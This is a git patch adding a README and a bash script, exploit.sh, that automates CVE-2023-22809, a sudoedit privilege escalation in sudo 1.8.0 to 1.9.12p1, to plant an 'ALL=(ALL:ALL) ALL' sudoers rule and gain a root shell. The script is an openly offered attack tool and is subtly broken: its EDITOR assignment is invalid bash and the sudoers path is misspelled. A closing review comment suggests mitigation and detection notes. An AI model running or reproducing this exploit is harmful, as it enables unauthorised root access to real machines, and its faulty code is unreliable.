From c4d113b155e52b4c14ca4fbcb2c47c82d915bf50 Mon Sep 17 00:00:00 2001
From: Martin Romera Sobrado
Date: Sat, 21 Jan 2023 16:22:20 +0100
Subject: [PATCH] Initial Commit Initial Commit
---
README.md | 13 +++++++++++++
exploit.sh | 31 +++++++++++++++++++++++++++++++
2 files changed, 44 insertions(+)
create mode 100644 README.md
create mode 100644 exploit.sh
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..db4ead3
--- /dev/null
+++ b/README.md
@@ -0,0 +1,13 @@
+# CVE-2023-22809
+
+## sudo Privilege escalation
+
+Affected sudo versions: 1.8.0 to 1.9.12p1
+
+This script automates the exploitation of the CVE-2023-22809 vulnerability to
+gain a root shell.
+
+The script checks if the current user has access to run the `sudoedit` or
+`sudo -e` command for some file with root privileges. If it does it opens the
+sudoers file for the attacker to introduce the privilege escalation policy
+for the current user and get a root shell.
diff --git a/exploit.sh b/exploit.sh
new file mode 100644
index 0000000..1f6a8eb
--- /dev/null
+++ b/exploit.sh
@@ -0,0 +1,31 @@
+#!/usr/bin/env bash
+#
+# sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
+#
+# Exploit Author: n3m1.sys
+# CVE: CVE-2023-22809
+# Vendor Homepage: https://www.sudo.ws/
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
+# Version: 1.8.0 to 1.9.12p1
+# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
+#
+# Running this exploit on a vulnerable system allows a localiattacker to gain
+# a root shell on the machine.
+#
+# The exploit checks if the current user has privileges to run sudoedit or
+# sudo -e on a file as root. If so it will open the sudoers file for the
+# attacker to add a line to gain privileges on all the files and get a root
+# shell.
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-)
+
+if [ -z "$EXPLOITABLE" ]; then
+ echo "> This user can't run sudoedit as root"
+else
+ echo "> BINGO! User exploitable"
+ echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
+ echo "$USER ALL=(ALL:ALL) ALL"
+ read -n 1 -s -r -p "Press any key to continue..."
+ EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
+ sudo su root
+fi
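Review bot: The header comment block of exploit.sh records the affected range and what the script does, but nothing a defender can act on; after the `# Tested on:` line I would add `# Mitigation: run a sudo release newer than the affected range above, or drop SUDO_EDITOR, VISUAL and EDITOR from the sudoedit environment with env_delete in sudoers.` The `echo` lines in the `else` branch show that the intended end state is a persistent `$USER ALL=(ALL:ALL) ALL` rule, so a second line, `# Leaves behind: a sudoers rule granting the invoking user ALL=(ALL:ALL) ALL; audit sudoers for it.`, would tell responders what to look for. A third, `# Detection: sudoedit / sudo -e runs whose editor variable carries a "--" argument.`, follows from the `EDITOR` line, which places `--` inside the editor string.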